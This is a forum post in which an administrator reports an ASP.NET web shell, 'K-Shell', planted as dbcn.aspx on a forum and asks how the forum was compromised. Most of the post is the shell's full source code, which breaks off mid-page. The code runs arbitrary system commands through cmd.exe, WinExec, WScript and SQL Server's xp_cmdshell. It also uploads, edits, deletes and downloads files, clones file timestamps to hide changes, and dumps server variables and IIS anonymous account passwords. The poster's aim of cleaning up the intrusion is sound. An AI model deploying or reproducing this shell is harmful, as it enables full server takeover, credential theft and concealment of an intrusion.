  [Question]   Forum WWF 9.53 infected with K-SHELL, how to fix it 24/11/2008 12:17:20 (+0700) | #1 | 160026
ktstbniit
Member

Joined: 03/01/2007 10:39:15
Messages: 5
Today when I went into the forum, I found a file named dbcn.aspx; on opening it, I guessed it was definitely a shell. When run, it displays the following: K - Shell ....kikicoco

I have checked all the places where users can upload. However, I would like any member who has experience with this to share with me which places in the forum need to be fixed.

Below is its source code:

Code:
<%@ Page Language="VB" ContentType="text/html"  validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<script runat="server">
Dim PASSWORD as string = "26d49f07ceebca39e994ca12a3b52f2d"   'Hash MD5 of password
dim url,TEMP1,TEMP2,TITLE as string
Function GetMD5(ByVal strPlain As String) As String
 	Dim UE As UnicodeEncoding = New UnicodeEncoding
 	Dim HashValue As Byte()
 	Dim MessageBytes As Byte() = UE.GetBytes(strPlain)
 	Dim md5 As MD5 = New MD5CryptoServiceProvider
 	Dim strHex As String = ""
 	HashValue = md5.ComputeHash(MessageBytes)
	 For Each b As Byte In HashValue
   	strHex += String.Format("{0:x2}", b)
 	Next
 	Return strHex
End Function
Sub Login_click(sender As Object, E As EventArgs)
	if GetMD5(Textbox.Text)=PASSWORD then     
		session("kikicoco")=1
		session.Timeout=45
	else
		response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
	end if
End Sub
'Run w32 shell
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long

Sub RunCmdW32(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")		
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtCommand1") = "" Then
		command = "dir c:\"	
	else 
		command = Request.Form("txtCommand1")
	End If	
	ExecuteCommand1(command,tempFile)
	OutputTempFile1(tempFile,fileObject)
	'txtCommand1.text=""
End Sub
function ExecuteCommand1(command, tempFile)
	Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
	Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
	Dim FailIfExists
	
	local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
	local_copy_of_cmd = Local_dir+"cmd.exe"
	Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\smssa.exe"
	CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
	errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
	response.write(errReturn)
	thread.sleep(500)
	end function
Sub OutputTempFile1(tempFile,oFileSys)
	On Error Resume Next 
	dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
	resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
   	oFile.Close
   	Call oFileSys.DeleteFile(tempFile, True)	 
End sub
'End w32 shell
'Run WSH shell
Sub RunCmdWSH(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
	dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtcommand2") = "" Then
		command = "dir c:\"	
	else 
		command = Request.Form("txtcommand2")
	End If	  
	ExecuteCommand2(command,tempFile)
	OutputTempFile2(tempFile,fileObject)
	txtCommand2.text=""
End Sub
Function ExecuteCommand2(cmd_to_execute, tempFile)
	  Dim oScript
	  oScript = Server.CreateObject("WSCRIPT.SHELL")
      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
End function
Sub OutputTempFile2(tempFile,fileObject)
    On Error Resume Next
	dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
	resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
	oFile.Close
	Call fileObject.DeleteFile(tempFile, True)
End sub
'End WSH shell

'System infor
Sub output_all_environment_variables(mode)
   	Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
   	Dim de As DictionaryEntry
	For Each de In  environmentVariables
	if mode="HTML" then
	response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
	else
	if mode="text"
	response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
	end if		
	end if
   	Next
End sub
Sub output_all_Server_variables(mode)
    dim item
    for each item in request.servervariables
	if mode="HTML" then
	response.write("<b>" + item + "</b> : ")
	response.write(request.servervariables(item))
	response.write("<br>")
	else
		if mode="text"
			response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
		end if		
	end if
           next
End sub
'End sysinfor

'Begin List processes
Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i

		'on error resume next

		table("0","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)

		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
		
		fields_split = split(Fields_to_Show,",")
		for each item in objProcessInfo	
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))				
					next
				end if
			_tr
		next
End function
Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i,count
		newline
		rw("Showing the first " + cstr(MaxCount) + " Entries")
		newline
		newline
		table("1","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
		_table
		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
'		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
		objProcessInfo = winObj.InstancesOf(Wmi_Function)					
		
		fields_split = split(Fields_to_Show,",")
		count = 0
		for each item in objProcessInfo		
			count = Count + 1
			table("1","","")
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(item.properties_.item(fields_split(i)).value)				
					next
				end if
			_tr
			if count > MaxCount then exit for
		next
End function
'End List processes
'Begin IIS_list_Anon_Name_Pass
Sub IIS_list_Anon_Name_Pass()
		Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
		
		IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") 			' Create an instance of the IIsComputer object
		providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
		nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
		
		Dim MaxCount = 20,Count = 0
		hr
		RW("only showing the first "+cstr(MaxCount) + " items")
		hr
		for each item in nodeObj
			response.write("<b>" + item.AppFriendlyName + " </b> -  ")
			response.write("(" + item.AppPoolId + ") ")
		
			response.write(item.AnonymousUserName + " : ")
			response.write(item.AnonymousUserPass)
			
			response.write("<br>")
			
			response.flush
			Count = Count +1
			If Count > MaxCount then exit for
		next		
		hr
End sub	
'End IIS_list_Anon_Name_Pass
Sub RunCMD(Src As Object, E As EventArgs)
	Try
	Dim kProcess As New Process()
	Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
	kProcessStartInfo.UseShellExecute = False
	kProcessStartInfo.RedirectStandardOutput = true
	kProcess.StartInfo = kProcessStartInfo
	kProcessStartInfo.Arguments="/c " & Cmd.text
	kProcess.Start()
	Dim myStreamReader As StreamReader = kProcess.StandardOutput
	Dim myString As String = myStreamReader.Readtoend()
	kProcess.Close()
	result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
	Cmd.text=""
	Catch
	result.text="This function has disabled!"
	End Try
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
	existdir(time1.Text)
	existdir(time2.Text)
	Dim thisfile As FileInfo =New FileInfo(time1.Text)
	Dim thatfile As FileInfo =New FileInfo(time2.Text)
	thisfile.LastWriteTime = thatfile.LastWriteTime
	thisfile.LastAccessTime = thatfile.LastAccessTime
	thisfile.CreationTime = thatfile.CreationTime
	response.Write("<font color=""red"">Clone Time Success!</font>")
End Sub
sub Editor(Src As Object, E As EventArgs)
	dim mywrite as new streamwriter(filepath.text,false,encoding.default)
	mywrite.write(content.text)
	mywrite.close
	response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
	dim filename,loadpath as string
	filename=path.getfilename(UpFile.value)
	loadpath=request.QueryString("src") & filename
	if  file.exists(loadpath)=true then 
		response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
		response.End()
	end if
	UpFile.postedfile.saveas(loadpath)
	response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
	response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
	url=request.form("src")
	if NewFile.Checked = True then
		dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
		mywrite.close
		response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
	else
		directory.createdirectory(url & NewName.Text)
		response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
	end if
End Sub
Sub del(a)
	if right(a,1)="\" then
		dim xdir as directoryinfo
		dim mydir as new DirectoryInfo(a)
		dim xfile as fileinfo
		for each xfile in mydir.getfiles()
			file.delete(a & xfile.name)
		next
		for each xdir in mydir.getdirectories()
			call del(a & xdir.name & "\")
		next
		directory.delete(a)
	else
		file.delete(a)
	end if
End Sub
Sub copydir(a,b)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(a)
	dim xfile as fileinfo
	for each xfile in mydir.getfiles()
		file.copy(a & "\" & xfile.name,b & xfile.name)
	next
	for each xdir in mydir.getdirectories()
		directory.createdirectory(b & path.getfilename(a & xdir.name))
		call copydir(a & xdir.name & "\",b & xdir.name & "\")
	next
End Sub
Sub xexistdir(temp,ow)
	if directory.exists(temp)=true or file.exists(temp)=true then 
		if ow=0  then
			response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
		elseif ow=1 then
			del(temp)
		else
			dim d as string = session("cutboard")
			if right(d,1)="\" then
				TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			else
				TEMP2=url & second(now) & replace(path.getfilename(d),"","")
			end if
		end if
	end if
End Sub
Sub existdir(temp)
		if  file.exists(temp)=false and directory.exists(temp)=false then 
			response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
			response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
			response.End()
		end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
	Dim adoConn,strQuery,recResult,strResult
	if SqlName.Text<>"" then
		adoConn=Server.CreateObject("ADODB.Connection") 
		adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) 
		If Sqlcmd.Text<>"" Then 
			strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" 
	  		recResult = adoConn.Execute(strQuery) 
 	 		If NOT recResult.EOF Then 
   				Do While NOT recResult.EOF 
    				strResult = strResult & chr(13) & recResult(0).value
    				recResult.MoveNext 
   				Loop 
 	 		End if 
  			recResult = Nothing 
  			strResult = Replace(strResult," "," ") 
  			strResult = Replace(strResult,"<","<") 
  			strResult = Replace(strResult,">",">") 
			resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
			SqlCMD.Text=""
		 End if 
  		adoConn.Close 
	 End if
 End Sub
Function GetStartedTime(ms) 
	GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP() 
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
	dim temp,k as integer
	temp=1
	k=0
	if len(nowdir)>4 then 
		nowdir=left(nowdir,len(nowdir)-1) 
	end if
	do while temp<>0
		k=temp+1
		temp=instr(temp,nowdir,"\")
		if temp =0 then
			exit do
		end if
		temp = temp+1
	loop
	if k<>2 then
		getparentdir=mid(nowdir,1,k-2)
	else
		getparentdir=nowdir
	end if
End function
Function Rename()
	url=request.QueryString("src")
	if file.exists(Getparentdir(url) & request.Form("name")) then
		rename=0   
	else
		file.copy(url,Getparentdir(url) & request.Form("name"))
		del(url)
		rename=1
	end if
End Function 
Function GetSize(temp)
	if temp < 1024 then
		GetSize=temp & " bytes"
	else
		if temp\1024 < 1024 then
			GetSize=temp\1024 & " KB"
		else
			if temp\1024\1024 < 1024 then
				GetSize=temp\1024\1024 & " MB"
			else
				GetSize=temp\1024\1024\1024 & " GB"
			end if
		end if
	end if
End Function 
	Sub downTheFile(thePath)
		dim stream
		stream=server.createObject("adodb.stream")
		stream.open
		stream.type=1
		stream.loadFromFile(thePath)
		response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
		response.addHeader("Content-Length",stream.Size)
		response.charset="UTF-8"
		response.contentType="application/octet-stream"
		response.binaryWrite(stream.read)
		response.flush
		stream.close
		stream=nothing
		response.End()
End Sub
'H T M L  S N I P P E T S
public sub Newline
		response.write("<BR>")
	end sub
	
	public sub TextNewline
		response.write(vbnewline)
	end sub

	public sub rw(text_to_print)	  ' Response.write
		response.write(text_to_print)
	end sub

	public sub rw_b(text_to_print)
		rw("<b>"+text_to_print+"</b>")
	end sub

	public sub hr()
		rw("<hr>")
	end sub

	public sub ul()
		rw("<ul>")
	end sub

	public sub _ul()
		rw("</ul>")
	end sub

	public sub table(border_size,width,height)
		rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
	end sub

	public sub _table()
		rw("</table>")
	end sub

	public sub tr()
		rw("<tr>")
	end sub

	public sub _tr()
		rw("</tr>")
	end sub

	public sub td()
		rw("<td>")
	end sub

	public sub _td()
		rw("</td>")
	end sub

	public sub td_span(align,name,contents)
		rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
	end sub

	Public sub td_link(align,title,link,target)
		rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
	end sub

	Public sub link(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
	end sub

	Public sub link_hr(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		hr
	end sub

	Public sub link_newline(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		newline
	end sub
	
	public sub empty_Cell(ColSpan)
		rw("<td colspan='"+cstr(colspan)+"'></td>")
	end sub

	public sub empty_row(ColSpan)
		rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
	end sub

       	Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
            dim rowItem

            rowItems = split(rowItems,",")
            response.write("<tr bgcolor="+bgcolor+">")
            for each rowItem in RowItems
                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
            next
            response.write("</tr>")

        end sub

        Public sub TR_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub
	

        Public sub Surround_by_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub

        Public sub Surround_by_TD_and_Bold(cellContents)
            response.write("<td><b>")
            response.write(cellContents)
            response.write("</b></td>")
        end sub

        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
            response.write(cellContents)
            response.write("</b></font></td>")
        end sub
	Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
		response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
		response.write("    <tr heigth=20>")
		response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
		response.write("    </tr>")
		response.write("    <tr>")
		response.write("      <td>"+main_Cell_contents+"</td>")
		response.write("    </tr>")
		response.write("  </table>")
		response.write("</div>")
	end sub

	Public sub Create_Div_open(top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
	end sub


	Public sub Create_Div_close()
		response.write("</div>")
	end sub

	public sub Create_Iframe(left, top, width, height, name,src)
		rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
    		rw("</span>")
	end sub

	public sub Create_Iframe_relative(width, height, name,src)
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
	end sub

	public sub return_100_percent_table()
		rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
	end sub

	public sub font_size(size)
		rw("<font size="+size+">")
	end sub

	public sub end_font()
		rw("</font>")
	end sub

	public sub red(contents)
		rw("<font color=red>"+contents+"</font>")
	end sub

	public sub yellow(contents)
		rw("<font color='#FF8800'>"+contents+"</font>")
	end sub

	public sub green(contents)
		rw("<font color=green>"+contents+"</font>")
	end sub
	public sub print_var(var_name, var_value,var_description)
		if var_description<> "" Then
			rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
		else
			rw(b_(var_name)+" : " + var_value)
		end if
		newline
	end sub

' Functions

	public function br_()
		br_ = "<br>"
	end function

	public function b_(contents)
		b_ = "<b>"+ contents + "</b>"
	end function

	public function i_(contents)
		i_ = "<i>"+ contents + "</i>"
	end function

	public function li_(contents)
		li_ = "<li>"+ contents + "</li>"
	end function

	public function h1_(contents)
		h1_ = "<h1>"+ contents + "</h1>"
	end function

	public function h2_(contents)
		h2_ = "<h2>"+ contents + "</h2>"
	end function

	public function h3_(contents)
		h3_ = "<h3>"+ contents + "</h3>"
	end function

	public function big_(contents)
		big_ = "<big>"+ contents + "</big>"
	end function

	public function center_(contents)
		center_ = "<center>"+ cstr(contents) + "</center>"
	end function


	public function td_force_width_(width)
		td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
	end function


	public function red_(contents)
		red_ = "<font color=red>"+contents+"</font>"
	end function

	public function yellow_(contents)
		yellow_ = "<font color='#FF8800'>"+contents+"</font>"
	end function

	public function green_(contents)
		green_ = "<font color=green>"+contents+"</font>"
	end function

	Public function link_(title,link,target)
		link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
	end function
'End HTML SNIPPETS	
</script>
<%
if request.QueryString("action")="down" and session("kikicoco")=1 then
		downTheFile(request.QueryString("src"))
		response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then 
TITLE="CMD.NET"
elseif hu="cmdw32" then 
TITLE="ASP.NET W32 Shell"
elseif hu="cmdwsh" then 
TITLE="ASP.NET WSH Shell"
elseif hu="sqlrootkit" then 
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then 
TITLE="Clone Time"
elseif hu="information" then 
TITLE="Web Server Info"
elseif hu="goto" then 
TITLE="K-Shell 1.0"
elseif hu="pro" then 
TITLE="List processes from server"
elseif hu="user" then 
TITLE="List User Accounts"
elseif hu="applog" then 
TITLE="List Application Event Log Entries"
elseif hu="syslog" then 
TITLE="List System Event Log Entries"
elseif hu="auser" then 
TITLE="IIS List Anonymous' User details"
else 
TITLE=request.ServerVariables("HTTP_HOST") 
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
	color: #000000;
	font-family: Verdana;
}
body {
	background-color: #ffffff;
	font-size:12px; 
}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #FF0000}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title><%=TITLE%></title>
</head>
<body>
<div align="center">K-Shell 1.0 By <a href="" target="_blank" title="Welcome to my page:)">kikicoco</a> from Vietnam [<a href="" target="_blank">VN</a>]</div>
<hr>
<%
Dim error_x as Exception
Try
if session("kikicoco")<>1 then
	'response.Write("<br>")
	'response.Write("Hello , thank you for using my program !<br>")
	'response.Write("This program is run at ASP.NET Environment and manage the web directory.<br>")
	'response.Write("Maybe this program looks like a backdoor , but I wish you like it and don't hack :p<br><br>")
	'response.Write("<span class=""style3"">Notice:</span> only click ""Login"" to login.")
%>
<form runat="server">
  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
</form> 
<%
else
	dim temp as string
	temp=request.QueryString("action")
	if temp="" then temp="goto"
	select case temp
	case "goto"
		if request.QueryString("src")<>"" then
			url=request.QueryString("src")
		else
			url=server.MapPath(".") & "\"
		end if
	call existdir(url)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(url)
	dim hupo as string
	dim xfile as fileinfo
%>
<table width="90%"  border="0" align="center">
  <tr>
  	<td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  </tr>
  <tr>
    <td width="13%">Operate:</td>
    <td width="87%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - 
      <%if session("cutboard")<>"" then%>
      <a href="?action=plaster&src=<%=server.UrlEncode(url)%>" title="you can plaster">Paste</a> - 
      <%else%>
	Paste - 
<%end if%>
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit">Quit</a></td>
  </tr>
  <tr>
    <td>
	Go to: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
 	response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
  </tr>

  <tr>
    <td>Tool:</td>
    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro" >List Processes</a></td>    
  </tr>
  <tr>
    <td> </td>
    <td><a href="?action=applog" >Application Event Log </a> - <a href="?action=user" >List User Accounts</a> - <a href="?action=syslog" >System Log</a> - <a href="?action=auser" >IIS List Anonymous' User details</a></td>    
  </tr>
</table>
<hr>
<table width="90%"  border="0" align="center">
	<tr>
	<td width="40%"><strong>Name</strong></td>
	<td width="15%"><strong>Size</strong></td>
	<td width="20%"><strong>ModifyTime</strong></td>
	<td width="25%"><strong>Operate</strong></td>
	</tr>
      <tr>
        <td><%
		hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
		response.Write(hupo)
		for each xdir in mydir.getdirectories()
			response.Write("<tr>")
			dim filepath as string 
			filepath=server.UrlEncode(url & xdir.name)
			hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
			response.Write(hupo)
			response.Write("<td><dir></td>")
			response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
			hupo="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
			response.Write(hupo)
			response.Write("</tr>")
		next
		%></td>
  </tr>
		<tr>
        <td><%
		for each xfile in mydir.getfiles()
			dim filepath2 as string
			filepath2=server.UrlEncode(url & xfile.name)
			response.Write("<tr>")
			hupo="<td>" & xfile.name & "</td>"
			response.Write(hupo)
			hupo="<td>" & GetSize(xfile.length) & "</td>"
			response.Write(hupo)
			response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
			hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"			
			response.Write(hupo)
			response.Write("</tr>")
		next
		response.Write("</table>")
		%></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
	dim CIP,CP as string
	if getIP()<>request.ServerVariables("REMOTE_ADDR") then
			CIP=getIP()
			CP=request.ServerVariables("REMOTE_ADDR")
	else
			CIP=request.ServerVariables("REMOTE_ADDR")
			CP="None"
	end if
%>
<div align=center>[ Web Server Information ]        <i><a href="javascript:history.back(1);">Back</a></i></div><br>
<table width="80%"  border="1" align="center">
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
    <td><%=Session.SessionID%></td>
  </tr>
  <tr>
    <td colspan="2"><span class="style3">Client Infomation</span></td>
  </tr>
  <tr>
    <td>Client Proxy</td>
    <td><%=CP%></td>
  </tr>
  <tr>
    <td>Client IP</td>
    <td><%=CIP%></td>
  </tr>
  <tr>
    <td>User</td>
    <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  </tr>
</table>
<table align=center>
	<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
	<tr>
		<td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
